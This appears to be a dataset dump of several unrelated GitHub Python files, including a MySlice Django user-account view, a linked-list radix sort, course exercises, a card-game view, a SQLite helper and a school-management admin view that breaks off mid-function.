[{'platform_no_access': t[0]}\n for t in itertools.izip_longest(total_platform_list)]\n\n ## check pi or no\n pi_status = self.request.session['user']['pi']\n\n context = super(UserView, self).get_context_data(**kwargs)\n context['principal_acc'] = principal_acc_list\n context['ref_acc'] = ref_acc_list\n context['platform_list'] = platform_list\n context['my_users'] = my_users\n context['my_slices'] = my_slices\n context['my_auths'] = my_auths\n context['user_status'] = user_status\n context['user_email'] = user_email\n context['firstname'] = config.get('firstname',\"?\")\n context['lastname'] = config.get('lastname',\"?\")\n context['fullname'] = context['firstname'] +' '+ context['lastname']\n context['authority'] = config.get('authority',\"Unknown Authority\")\n context['user_private_key'] = account_priv_key\n context['pi'] = pi_status\n \n # XXX This is repeated in all pages\n # more general variables expected in the template\n context['title'] = 'Platforms connected to MySlice'\n # the menu items on the top\n context['topmenu_items'] = topmenu_items_live('My Account', page)\n # so we can sho who is logged\n context['username'] = the_user(self.request)\n context['theme'] = self.theme\n# context ['firstname'] = config['firstname']\n prelude_env = page.prelude_env()\n context.update(prelude_env)\n return context\n\n\n@login_required\n#my_acc form value processing\ndef user_process(request, **kwargs):\n \n for key, value in kwargs.iteritems():\n if key == \"email\":\n selected_email=value\n\n redirect_url = \"/portal/user/\"+selected_email\n \n user_query = Query().get('local:user').filter_by('email', '==', selected_email).select('user_id','email','password','config')\n user_details = execute_admin_query(request, user_query)\n\n # getting the user_id from the session\n for user_detail in user_details:\n user_id = user_detail['user_id']\n user_email = user_detail['email']\n\n account_query = Query().get('local:account').filter_by('user_id', '==', user_id).select('user_id','platform_id','auth_type','config')\n account_details = execute_admin_query(request, account_query)\n\n platform_query = Query().get('local:platform').select('platform_id','platform')\n platform_details = execute_admin_query(request, platform_query)\n \n\n for account_detail in account_details:\n for platform_detail in platform_details:\n # Add reference account to the platforms\n if 'add_'+platform_detail['platform'] in request.POST:\n platform_id = platform_detail['platform_id']\n user_params = {'platform_id': platform_id, 'user_id': user_id, 'auth_type': \"reference\", 'config': '{\"reference_platform\": \"myslice\"}'}\n manifold_add_account(request, user_params)\n messages.info(request, 'Reference Account is added to the selected platform successfully!')\n return HttpResponseRedirect(redirect_url)\n\n # Delete reference account from the platforms\n if 'delete_'+platform_detail['platform'] in request.POST:\n platform_id = platform_detail['platform_id']\n user_params = {'user_id':user_id}\n manifold_delete_account(request, platform_id, user_id, user_params)\n messages.info(request, 'Refeence Account is removed from the selected platform')\n return HttpResponseRedirect(redirect_url)\n\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n acc_slice_cred = account_config.get('delegated_slice_credentials','N/A')\n acc_auth_cred = account_config.get('delegated_authority_credentials','N/A')\n \n # adding the slices and corresponding credentials to list\n if 'N/A' not in acc_slice_cred:\n slice_list = []\n slice_cred = [] \n for key, value in acc_slice_cred.iteritems():\n slice_list.append(key) \n slice_cred.append(value)\n # special case: download each slice credentials separately \n for i in range(0, len(slice_list)):\n if 'dl_'+slice_list[i] in request.POST:\n slice_detail = \"Slice name: \" + slice_list[i] +\"\\nSlice Credentials: \\n\"+ slice_cred[i]\n response = HttpResponse(slice_detail, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"slice_credential.txt\"'\n return response\n\n # adding the authority and corresponding credentials to list\n if 'N/A' not in acc_auth_cred:\n auth_list = []\n auth_cred = [] \n for key, value in acc_auth_cred.iteritems():\n auth_list.append(key) \n auth_cred.append(value)\n # special case: download each slice credentials separately\n for i in range(0, len(auth_list)):\n if 'dl_'+auth_list[i] in request.POST:\n auth_detail = \"Authority: \" + auth_list[i] +\"\\nAuthority Credentials: \\n\"+ auth_cred[i]\n response = HttpResponse(auth_detail, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"auth_credential.txt\"'\n return response\n\n if 'submit_name' in request.POST:\n edited_first_name = request.POST['fname']\n edited_last_name = request.POST['lname']\n \n config={}\n for user_config in user_details:\n if user_config['config']:\n config = json.loads(user_config['config'])\n config['firstname'] = edited_first_name\n config['lastname'] = edited_last_name\n config['authority'] = config.get('authority','Unknown Authority')\n updated_config = json.dumps(config)\n user_params = {'config': updated_config}\n else: # it's needed if the config is empty \n user_config['config']= '{\"firstname\":\"' + edited_first_name + '\", \"lastname\":\"'+ edited_last_name + '\", \"authority\": \"Unknown Authority\"}'\n user_params = {'config': user_config['config']} \n # updating config local:user in manifold \n manifold_update_user(request, user_email, user_params)\n # this will be depricated, we will show the success msg in same page\n # Redirect to same page with success message\n messages.success(request, 'Sucess: First Name and Last Name Updated.')\n return HttpResponseRedirect(redirect_url) \n \n elif 'submit_auth' in request.POST:\n edited_auth = request.POST['authority']\n \n config={}\n for user_config in user_details:\n if user_config['config']:\n config = json.loads(user_config['config'])\n config['firstname'] = config.get('firstname', 'N/A')\n config['lastname'] = config.get('lastname','N/A')\n config['authority'] = edited_auth\n updated_config = json.dumps(config)\n user_params = {'config': updated_config}\n else: # it's needed if the config is empty \n user_config['config']= '{\"firstname\": \"N/A\", \"lastname\":\"N/A\", \"authority\":\"' + edited_auth + '\"}'\n user_params = {'config': user_config['config']}\n # updating config local:user in manifold \n manifold_update_user(request, user_email, user_params)\n # this will be depricated, we will show the success msg in same page\n # Redirect to same page with success message\n messages.success(request, 'Sucess: Authority Updated.')\n return HttpResponseRedirect(redirect_url)\n\n# XXX TODO: Factorize with portal/registrationview.py\n\n elif 'generate' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n from Crypto.PublicKey import RSA\n private = RSA.generate(1024)\n private_key = json.dumps(private.exportKey())\n public = private.publickey()\n public_key = json.dumps(public.exportKey(format='OpenSSH'))\n # updating manifold local:account table\n account_config = json.loads(account_detail['config'])\n # preserving user_hrn\n user_hrn = account_config.get('user_hrn','N/A')\n keypair = '{\"user_public_key\":'+ public_key + ', \"user_private_key\":'+ private_key + ', \"user_hrn\":\"'+ user_hrn + '\"}'\n updated_config = json.dumps(account_config) \n # updating manifold\n user_params = { 'config': keypair, 'auth_type':'managed'}\n manifold_update_account(request, user_id, user_params)\n # updating sfa\n #public_key = public_key.replace('\"', '');\n #user_pub_key = {'keys': public_key}\n #sfa_update_user(request, user_hrn, user_pub_key)\n messages.success(request, 'Sucess: New Keypair Generated! Delegation of your credentials will be automatic.')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n elif 'upload_key' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n up_file = request.FILES['pubkey']\n file_content = up_file.read()\n file_name = up_file.name\n file_extension = os.path.splitext(file_name)[1] \n allowed_extension = ['.pub','.txt']\n if file_extension in allowed_extension and re.search(r'ssh-rsa',file_content):\n account_config = json.loads(account_detail['config'])\n # preserving user_hrn\n user_hrn = account_config.get('user_hrn','N/A')\n file_content = '{\"user_public_key\":\"'+ file_content + '\", \"user_hrn\":\"'+ user_hrn +'\"}'\n #file_content = re.sub(\"\\r\", \"\", file_content)\n #file_content = re.sub(\"\\n\", \"\\\\n\",file_content)\n file_content = ''.join(file_content.split())\n #update manifold local:account table\n user_params = { 'config': file_content, 'auth_type':'user'}\n manifold_update_account(request,user_id,user_params)\n # updating sfa\n #user_pub_key = {'keys': file_content}\n #sfa_update_user(request, user_hrn, user_pub_key)\n messages.success(request, 'Publickey uploaded! Please delegate your credentials using SFA: http://trac.myslice.info/wiki/DelegatingCredentials')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'RSA key error: Please upload a valid RSA public key [.txt or .pub].')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n\n elif 'dl_pubkey' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n public_key = account_config['user_public_key'] \n response = HttpResponse(public_key, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"pubkey.txt\"'\n return response\n break\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n elif 'dl_pkey' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n if 'user_private_key' in account_config:\n private_key = account_config['user_private_key']\n response = HttpResponse(private_key, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"privkey.txt\"'\n return response\n else:\n messages.error(request, 'Download error: Private key is not stored in the server')\n return HttpResponseRedirect(redirect_url)\n\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n# elif 'delete' in request.POST:\n# for account_detail in account_details:\n# for platform_detail in platform_details:\n# if platform_detail['platform_id'] == account_detail['platform_id']:\n# if 'myslice' in platform_detail['platform']:\n# account_config = json.loads(account_detail['config'])\n# if 'user_private_key' in account_config:\n# for key in account_config.keys():\n# if key == 'user_private_key': \n# del account_config[key]\n# \n# updated_config = json.dumps(account_config)\n# user_params = { 'config': updated_config, 'auth_type':'user'}\n# manifold_update_account(request,user_params)\n# messages.success(request, 'Private Key deleted. You need to delegate credentials manually once it expires.')\n# messages.success(request, 'Once your credentials expire, Please delegate manually using SFA: http://trac.myslice.info/wiki/DelegatingCredentials')\n# return HttpResponseRedirect(\"/portal/account/\")\n# else:\n# messages.error(request, 'Delete error: Private key is not stored in the server')\n# return HttpResponseRedirect(redirect_url)\n# \n# else:\n# messages.error(request, 'Account error: You need an account in myslice platform to perform this action') \n# return HttpResponseRedirect(redirect_url)\n\n #clear all creds\n elif 'clear_cred' in request.POST:\n clear_user_creds(request, user_email)\n messages.success(request, 'All Credentials cleared')\n return HttpResponseRedirect(redirect_url)\n\n #make a user PI\n elif 'makepi' in request.POST:\n # getting user's authority_hrn\n config={}\n for user_config in user_details:\n if user_config['config']:\n user_config = json.loads(user_config['config'])\n authority_hrn = user_config.get('authority','Unknown Authority')\n\n #getting user_hrn\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n user_hrn = account_config.get('user_hrn','N/A')\n \n authority_add_pis(request, authority_hrn, user_hrn)\n clear_user_creds(request, user_email)\n messages.success(request, 'User upgraded to PI')\n return HttpResponseRedirect(redirect_url)\n\n elif 'removepi' in request.POST:\n # getting user's authority_hrn\n config={}\n for user_config in user_details:\n if user_config['config']:\n user_config = json.loads(user_config['config'])\n authority_hrn = user_config.get('authority','Unknown Authority')\n #getting user_hrn\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n user_hrn = account_config.get('user_hrn','N/A')\n authority_remove_pis(request, authority_hrn, user_hrn)\n clear_user_creds(request, user_email)\n messages.success(request, 'PI downgraded to user')\n return HttpResponseRedirect(redirect_url)\n \n\n\n # Download delegated_user_cred\n elif 'dl_user_cred' in request.POST:\n if 'delegated_user_credential' in account_config:\n user_cred = account_config['delegated_user_credential']\n response = HttpResponse(user_cred, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"user_cred.txt\"'\n return response\n else:\n messages.error(request, 'Download error: User credential is not stored in the server')\n return HttpResponseRedirect(redirect_url)\n \n else:\n messages.info(request, 'Under Construction. Please try again later!')\n return HttpResponseRedirect(redirect_url)\n\n\n","repo_name":"onelab-eu/myslice","sub_path":"portal/manageuserview.py","file_name":"manageuserview.py","file_ext":"py","file_size_in_byte":29252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16479880830","text":"import datetime\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nif os.environ.get(\"APPLICATION_PATH\") is None:\n APPLICATION_PATH = \"/app\"\nelse:\n APPLICATION_PATH = os.environ.get('APPLICATION_PATH')\n\npaypal_footer = \"\"\"\n
\n
\n \n \n \n \n \"\"\n
\n Le service est gratuit, mais si tu souhaites soutenir le projet (serveur & domaine).\n
\n\"\"\"\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + datetime.timedelta(n)\n\n\ndef str2bool(v):\n if type(v) != bool:\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n else:\n return v\n\n\ndef is_float(element):\n try:\n float(element)\n return True\n except ValueError:\n return False\n\n\ndef reformat_json(yaml):\n result = {}\n for key, value in yaml.items():\n if value in [\"true\", \"false\"]:\n result[key] = str2bool(value)\n elif type(value) == dict:\n result[key] = value\n elif not isinstance(value, bool) and is_float(value):\n result[key] = float(value)\n else:\n result[key] = value\n return result","repo_name":"lezante/myelectricaldata","sub_path":"app/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"36403903758","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.previous = None\n\nclass LinkedList :\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __str__(self):\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.head, str(self.head.value) + \" \"\n while cur.next != None:\n s += str(cur.next.value) + \" \"\n cur = cur.next\n return s\n\n def __getitem__(self,index) :\n cur = self.head\n for _ in range(index) :\n cur = cur.next\n return cur.value\n\n def print(self) :\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.head, str(self.head.value)\n while cur.next != None:\n s += \" -> \" + str(cur.next.value) \n cur = cur.next\n return s\n\n def isEmpty(self):\n return self.head == None\n\n def addHead(self, item):\n new = Node(item)\n if self.isEmpty() :\n self.head = new\n self.tail = new\n else :\n current = self.head\n new.next = self.head\n current.previous = new\n self.head = new\n while current.next != None :\n current = current.next\n self.tail = current\n\n def append(self, item):\n new = Node(item)\n if self.isEmpty() :\n self.head = new\n self.tail = new\n else :\n current = self.head\n while current.next != None :\n current = current.next\n current.next = new\n new.previous = self.tail\n self.tail = new\n\n def insert(self, pos, item):\n p = Node(item)\n if int(pos) == 0 :\n p.next = self.head\n self.head = p\n else :\n q = self.head\n for _ in range(int(pos)-1) :\n q = q.next\n p.next = q.next\n q.next = p\n\n\n def index(self, item):\n n = 0\n if self.isEmpty() :\n return -1\n else :\n current = self.head\n while current :\n if str(current.value) == str(item) :\n return n\n else :\n current = current.next\n n += 1\n return -1\n\n def size(self):\n current = self.head\n n = 0\n while current :\n current = current.next\n n += 1\n return n\n\n def deQueue(self) :\n cur = self.head\n q = self.head.value\n if cur.next == None:\n self.head = None\n else:\n self.head = cur.next\n return q\n\n def pop(self):\n current = self.head\n if current.next == None :\n self.head = None\n self.tail = None\n else :\n self.head = current.next\n\ndef radix_sort(input) :\n L = LinkedList()\n for i in input :\n L.append(i)\n\n LL = LinkedList()\n for _ in range(10) :\n LL.append(LinkedList())\n\n round = 1\n while 1 :\n while not L.isEmpty() :\n num = L.deQueue()\n index_digit = get_digit(abs(int(num)),round)\n if LL[index_digit].isEmpty() :\n LL[index_digit].append(num)\n else:\n for i in range(LL[index_digit].size()) :\n if int(LL[index_digit][i]) <= int(num) :\n LL[index_digit].insert(i,num)\n break\n else :\n if i == LL[index_digit].size()-1 :\n LL[index_digit].append(num)\n else :\n continue\n print(\"Round :\",round)\n for j in range(0,10) :\n print(j,\": \",end='')\n if LL[j].isEmpty() :\n print(\"\")\n else :\n print(LL[j])\n print(\"------------------------------------------------------------\")\n done = True\n for i in range(1,10) :\n if not LL[i].isEmpty() :\n done = False\n for i in range (10) :\n while not LL[i].isEmpty() :\n L.append(LL[i].deQueue())\n if done :\n return L,round-1\n round += 1\n return L,round-2\n\n\ndef get_digit(n, d):\n for _ in range(d-1):\n n //= 10\n return n % 10\n\ninput = input(\"Enter Input : \").split(\" \")\nbefore = LinkedList()\nfor i in input :\n before.append(i)\nprint(\"------------------------------------------------------------\")\nafter, time = radix_sort(input)\nprint(time,\"Time(s)\")\nprint(f'Before Radix Sort : {before.print()}')\nprint(f'After Radix Sort : {after.print()}')","repo_name":"ThitarThitaporn/OOD_Program","sub_path":"4linkedList/5radixSort.py","file_name":"5radixSort.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"390318178","text":"#!/usr/bin/python3\ndef matrix_divided(matrix, div):\n new_matrix = []\n new_row = []\n\n for row in matrix:\n for num in row:\n if not isinstance(num, (int, float)):\n raise TypeError('matrix must be a matrix (list of lists) of integers/floats')\n if len(row) != len(matrix[0]):\n raise TypeError('Each row of the matrix must have the same size')\n if not isinstance(div, (int, float)):\n raise TypeError('div must be a number')\n if div is 0:\n raise ZeroDivisionError('division by zero')\n\n for row in matrix:\n for num in row:\n num = num / div\n num = round(num, 2)\n new_row.append(num)\n new_matrix.append(new_row)\n\n return new_matrix\n","repo_name":"tlvb25/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12940031824","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom .forms import GameForm\nfrom .models import GameResult\n\n\nclass GameView(View):\n form_class = GameForm\n template_name = 'test_game.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n board = ' '.join(board for board in request.POST.get('board', '')).split(' ')\n cards = request.POST.get('cards', '')\n cards = cards.replace(' ', '')\n cards = ' '.join(c.replace('\\u200b', '').replace('\\u200b', '') for c in cards.split(',')).split(' ')\n\n players = request.POST.get('players', '')\n end_game = len(board)\n\n d_players = {}\n for player in range(int(players)):\n d_players[int(player) + 1] = 0\n\n count = 0\n\n player = 1\n for card in cards:\n if player > int(players):\n player = 1\n count += 1\n try:\n player_position = d_players[player]\n\n if len(str(card)) == 2:\n index = board[player_position::].index(card[0]) + player_position\n index += board[index+1::].index(card[0]) + 1 + player_position\n else:\n index = board[player_position::].index(card) + 1 + player_position\n d_players[player] = index\n\n if d_players[player] >= end_game:\n self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), player, count)\n return render(request, self.template_name, {'message':\n f'Player {player} won after {count} cards'})\n player += 1\n except ValueError:\n self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), player, count)\n return render(request, self.template_name, {'message':\n f'Player {player} won after {count} cards WITH ERROR'})\n\n self.add_to_db(request.POST.get('board', ''), request.POST.get('cards', ''),\n request.POST.get('players', ''), 0, count)\n return render(request, self.template_name, {'message': f'No one won after {count} cards'})\n\n return render(request, self.template_name, {'message': 'Form is invalid!'})\n\n def add_to_db(self, board, cards, players, winner, count_cards_to_win):\n result = GameResult(board=board, cards=str(cards), players=int(players), winner=winner,\n count_cards_to_win=count_cards_to_win)\n result.save()\n","repo_name":"semmy07/test-game-django","sub_path":"game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12937995491","text":"import sqlite3\nfrom sqlite3 import Error\n\ndef init_conn(path):\n conn = None\n try:\n conn = sqlite3.connect(path)\n print (\"Connection established!\")\n except Error as e:\n print (e)\n print (\"Connection failed!\")\n return conn \n\ndef init_tables(connection):\n sql = \"CREATE TABLE IF NOT EXISTS hardware( id integer PRIMARY KEY, unit text NOT NULL, value text NOT NULL);\"\n connection.execute(sql)\n\ndef prepareDb(name):\n conn = init_conn(name)\n init_tables(conn)\n conn.close()\n\ndef getData(name):\n connection = init_conn(name)\n sql = \"SELECT * FROM hardware;\"\n cursor = connection.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n connection.close()\n\n return rows\n\ndef generateDataHTMLTable(rows):\n dataTable = \"\"\n for row in rows:\n dataTable += \"\"\n for cell in row:\n dataTable += \"\"\n dataTable += \"\"\n dataTable += \"
\" + str(cell) + \"
\"\n return dataTable\n\ndef sendData(db, unit, value):\n connection = init_conn(db)\n sql = \"INSERT INTO hardware(`unit`, `value`) VALUES(?, ?);\"\n args = (unit, value)\n cursor = connection.cursor()\n cursor.execute(sql, args)\n connection.commit()\n connection.close()\n","repo_name":"NG-2022-Stanislav-Mykhailenko/NG_2022_Stanislav_Mykhailenko","sub_path":"Lesson_6/Task 2/databaseWorker.py","file_name":"databaseWorker.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71949402162","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom student.models import *\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.core import serializers\nimport json\n\n# Create your views here.\n\ndef hod_home(request):\n student_count1=Students.objects.all().count()\n staff_count=Staffs.objects.all().count()\n subject_count=Subjects.objects.all().count()\n course_count=Courses.objects.all().count()\n\n course_all=Courses.objects.all()\n course_name_list=[]\n subject_count_list=[]\n student_count_list_in_course=[]\n for course in course_all:\n subjects=Subjects.objects.filter(course_id=course.id).count()\n students=Students.objects.filter(course_id=course.id).count()\n course_name_list.append(course.course_name)\n subject_count_list.append(subjects)\n student_count_list_in_course.append(students)\n\n subjects_all=Subjects.objects.all()\n subject_list=[]\n student_count_list_in_subject=[]\n for subject in subjects_all:\n course=Courses.objects.get(id=subject.course_id.id)\n student_count=Students.objects.filter(course_id=course.id).count()\n subject_list.append(subject.subject_name)\n student_count_list_in_subject.append(student_count)\n\n staffs=Staffs.objects.all()\n attendance_present_list_staff=[]\n attendance_absent_list_staff=[]\n staff_name_list=[]\n for staff in staffs:\n subject_ids=Subjects.objects.filter(staff_id=staff.admin.id)\n attendance=Attendance.objects.filter(subject_id__in=subject_ids).count()\n leaves=LeaveReportStaff.objects.filter(staff_id=staff.id,leave_status=1).count()\n attendance_present_list_staff.append(attendance)\n attendance_absent_list_staff.append(leaves)\n staff_name_list.append(staff.admin.username)\n\n students_all=Students.objects.all()\n attendance_present_list_student=[]\n attendance_absent_list_student=[]\n student_name_list=[]\n for student in students_all:\n attendance=AttendanceReport.objects.filter(student_id=student.id,status=True).count()\n absent=AttendanceReport.objects.filter(student_id=student.id,status=False).count()\n leaves=LeaveReportStudent.objects.filter(student_id=student.id,leave_status=1).count()\n attendance_present_list_student.append(attendance)\n attendance_absent_list_student.append(leaves+absent)\n student_name_list.append(student.admin.username)\n\n context = {\n \"student_count\":student_count1,\n \"staff_count\":staff_count,\n \"subject_count\":subject_count,\n \"course_count\":course_count,\n \"course_name_list\":course_name_list,\n \"subject_count_list\":subject_count_list,\n \"student_count_list_in_course\":student_count_list_in_course,\n \"student_count_list_in_subject\":student_count_list_in_subject,\n \"subject_list\":subject_list,\n \"staff_name_list\":staff_name_list,\n \"attendance_present_list_staff\":attendance_present_list_staff,\n \"attendance_absent_list_staff\":attendance_absent_list_staff,\n \"student_name_list\":student_name_list,\n \"attendance_present_list_student\":attendance_present_list_student,\n \"attendance_absent_list_student\":attendance_absent_list_student\n }\n return render(request,'hod/home.html',context)\n\ndef add_staff(request):\n if request.method ==\"POST\":\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n username=request.POST.get(\"username\")\n email=request.POST.get(\"email\")\n password=request.POST.get(\"password\")\n address=request.POST.get(\"address\")\n #CHECK IF USERNAME ALREADY EXIST\n if CustomUser.objects.filter(username=username):\n messages.error(request, \"Username Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n #CHECK IF EMAIL ALREADY EXIST\n if CustomUser.objects.filter(email=email):\n messages.error(request, \"Email Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n try:\n user=CustomUser.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=2)\n user.staffs.address=address\n user.save()\n messages.success(request,\"Successfully Added Staff\")\n return redirect(reverse('hod:add_staff'))\n except:\n messages.error(request,\"Failed to Add Staff\")\n return redirect(reverse('hod:add_staff'))\n\n return render(request,'hod/add_staff.html')\n\ndef add_course(request):\n if request.method ==\"POST\":\n get_course=request.POST.get(\"course\")\n try:\n course = Courses(course_name=get_course)\n course.save()\n messages.success(request,\"Course added\")\n return redirect(reverse('hod:add_course'))\n except:\n messages.error(request,\"Failed to Add course\")\n return redirect(reverse('hod:add_course'))\n\n \n return render(request, 'hod/add_course.html')\n\ndef add_student(request):\n courses = Courses.objects.all()\n session_years = SessionYear.objects.all()\n context = {\n 'courses': courses,\n 'session_years':session_years\n }\n if request.method == \"POST\":\n first_name=request.POST[\"first_name\"]\n last_name=request.POST[\"last_name\"]\n username=request.POST[\"username\"]\n email=request.POST[\"email\"]\n password=request.POST[\"password\"]\n address=request.POST[\"address\"]\n course_id=request.POST[\"course\"]\n sex=request.POST[\"sex\"]\n session_year = request.POST[\"session_year\"]\n profile_pic = request.FILES[\"profile\"]\n #CHECK IF USERNAME ALREADY EXIST\n if CustomUser.objects.filter(username=username):\n messages.error(request, \"Username Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n #CHECK IF EMAIL ALREADY EXIST\n if CustomUser.objects.filter(email=email):\n messages.error(request, \"Email Already Exist\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n try:\n user=CustomUser.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=3)\n user.students.address=address\n course_obj=Courses.objects.get(id=course_id)\n user.students.course_id=course_obj\n session_obj = SessionYear.objects.get(id=session_year)\n user.students.session_year=session_obj\n user.students.gender=sex\n user.students.profile_pic=profile_pic\n user.save()\n messages.success(request,\"Successfully Added Student\")\n return redirect(reverse(\"hod:add_student\"))\n except:\n messages.error(request,\"Failed to Add Student\")\n return redirect(reverse(\"hod:add_student\"))\n return render(request, 'hod/add_student.html',context)\n\ndef add_subject(request):\n courses = Courses.objects.all()\n staffs = CustomUser.objects.filter(user_type=2)\n context = {\n 'courses': courses,\n 'staffs':staffs\n }\n if request.method == \"POST\":\n subject_name=request.POST.get(\"subject_name\")\n course_id=request.POST.get(\"course\")\n course=Courses.objects.get(id=course_id)\n staff_id=request.POST.get(\"staff\")\n staff=CustomUser.objects.get(id=staff_id)\n\n try:\n subject=Subjects(subject_name=subject_name,course_id=course,staff_id=staff)\n subject.save()\n messages.success(request,\"Successfully Added Subject\")\n return redirect(reverse(\"hod:add_subject\"))\n except:\n messages.error(request,\"Failed to Add Subject\")\n return redirect(reverse(\"hod:add_subject\"))\n\n return render(request, 'hod/add_subject.html',context)\n\ndef add_session(request):\n if request.method == \"POST\":\n session_start_year = request.POST[\"session_start_year\"]\n session_end_year = request.POST[\"session_end_year\"]\n try:\n session_year = SessionYear(session_start_year=session_start_year,session_end_year=session_end_year)\n session_year.save()\n messages.success(request,\"Successfully Added add_session\")\n return redirect(reverse(\"hod:add_session\"))\n except:\n messages.error(request,\"Failed to Add Session\")\n return redirect(reverse(\"hod:add_session\"))\n\n \n return render(request, 'hod/add_session.html')\n\ndef manage_staff(request):\n staffs=Staffs.objects.all()\n context = {\n 'staffs':staffs\n }\n\n return render(request, 'hod/manage_staff.html', context)\n\ndef manage_student(request):\n students = CustomUser.objects.filter(user_type=3)\n context = {\n 'students': students\n }\n return render(request, 'hod/manage_student.html',context)\n\ndef manage_subject(request):\n subjects = Subjects.objects.all()\n context = {\n 'subjects': subjects\n }\n return render(request, 'hod/manage_subject.html',context)\n\ndef manage_course(request):\n courses = Courses.objects.all()\n context = {\n 'courses': courses\n }\n return render(request, 'hod/manage_course.html', context)\n\ndef manage_session(request):\n session_years = SessionYear.objects.all()\n context = {\n 'session_years': session_years\n }\n return render(request, 'hod/manage_session.html', context)\n\ndef edit_staff(request, pk):\n staff=Staffs.objects.get(id=pk)\n context = {\n 'staff': staff\n }\n if request.method ==\"POST\":\n admin_id=request.POST.get(\"admin_id\")\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n email=request.POST.get(\"email\")\n username=request.POST.get(\"username\")\n address=request.POST.get(\"address\")\n try:\n user=CustomUser.objects.get(id=admin_id)\n user.first_name=first_name\n user.last_name=last_name\n user.email=email\n user.username=username\n user.save()\n\n staff_model=Staffs.objects.get(id=pk)\n staff_model.address=address\n staff_model.save()\n messages.success(request,\"Successfully Edited Staff\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Staff\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n return render(request, 'hod/edit_staff.html', context)\n\n\ndef edit_student(request,pk):\n student = Students.objects.get(id=pk)\n courses = Courses.objects.all()\n session_years = SessionYear.objects.all()\n context = {\n 'student': student,\n 'courses':courses,\n 'session_years':session_years\n }\n\n if request.method == \"POST\":\n first_name=request.POST[\"first_name\"]\n last_name=request.POST[\"last_name\"]\n username=request.POST[\"username\"]\n email=request.POST[\"email\"]\n address=request.POST[\"address\"]\n course_id=request.POST[\"course\"]\n sex=request.POST[\"sex\"]\n session_year = 